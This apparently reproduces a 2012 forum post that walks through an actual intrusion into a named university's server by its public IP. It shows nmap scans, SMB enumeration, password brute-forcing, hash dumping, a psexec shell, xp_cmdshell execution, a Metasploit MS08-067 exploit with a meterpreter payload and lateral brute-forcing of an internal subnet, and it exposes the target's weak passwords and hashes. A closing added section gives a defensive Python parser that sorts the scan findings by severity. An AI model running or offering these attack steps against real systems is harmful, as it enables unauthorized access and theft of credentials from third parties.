nmap + msf intrusion of Guangxi Normal University

Original poster | Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser  // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// get the user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.2418)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2  // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely.
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241     // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole                                             // use msf to exploit the ms08-067 vulnerability against the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging into the whole internal subnet with the user names and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack succeeded, a simple msf + nmap attack~~

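Seen from the defender's side, the NSE output quoted in the post above is exactly what an internal vulnerability scan of one's own hosts returns, and the three findings that made this host fall (a blank administrator password, IPC$ readable anonymously, MS08-067 unpatched) can be pulled out of it automatically. The following is an added example, not code from the post: a small parser for the "Host script results:" block that turns smb-brute, smb-check-vulns and smb-enum-shares lines into findings; the sample text is constructed in the shape of the output above, with a placeholder host and no real address.

```python
import re

# Constructed sample shaped like the nmap NSE output quoted in the post above
# (smb-enum-shares, smb-brute, smb-check-vulns); no real host is referenced.
SAMPLE_SCAN = """\
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
"""

SCRIPT_HEADER = re.compile(r"^\|_?\s(\S+):\s*$")   # e.g. "| smb-brute:"
BRUTE_HIT = re.compile(r"^([^:\s]+):(\S+) => Login was successful$")
VULN_HIT = re.compile(r"^(MS\d{2}-\d{3}): VULNERABLE$")

def parse_host_scripts(text):
    """{script_name: [content lines]} taken from the 'Host script results:' block."""
    scripts, current, in_block = {}, None, False
    for line in text.splitlines():
        if line.startswith("Host script results:"):
            in_block = True
        elif in_block and not line.startswith("|"):
            break                            # first non-"|" line closes the block
        elif in_block and SCRIPT_HEADER.match(line):
            current = SCRIPT_HEADER.match(line).group(1)
            scripts[current] = []
        elif in_block and current is not None:
            # "|_" marks a script's last line; strip the prefix and the indent
            scripts[current].append(line[1:].lstrip("_").strip())
    return scripts

def triage(text):
    """Map the script output to (severity, finding) pairs; passwords are not copied out."""
    scripts = parse_host_scripts(text)
    findings = []
    for line in scripts.get("smb-brute", []):
        m = BRUTE_HIT.match(line)
        if m:
            sev = "critical" if m.group(2) == "<blank>" else "high"
            findings.append((sev, f"SMB login with guessable password: {m.group(1)}"))
    for line in scripts.get("smb-check-vulns", []):
        m = VULN_HIT.match(line)
        if m:
            findings.append(("critical", f"Unpatched {m.group(1)}"))
    shares = scripts.get("smb-enum-shares", [])
    for share, access in zip(shares, shares[1:]):   # share name line, then its access line
        if access.startswith("Anonymous access:") and "<none>" not in access:
            findings.append(("medium", f"Share {share} allows anonymous {access.split(':', 1)[1].strip()}"))
    return findings
```

Feed it the saved output of the scripts the post runs (`nmap --script=smb-enum-shares,smb-brute,smb-check-vulns` against your own range) and every host whose list is non-empty needs the password reset, the anonymous access removed or the patch applied before anyone else runs the same scan.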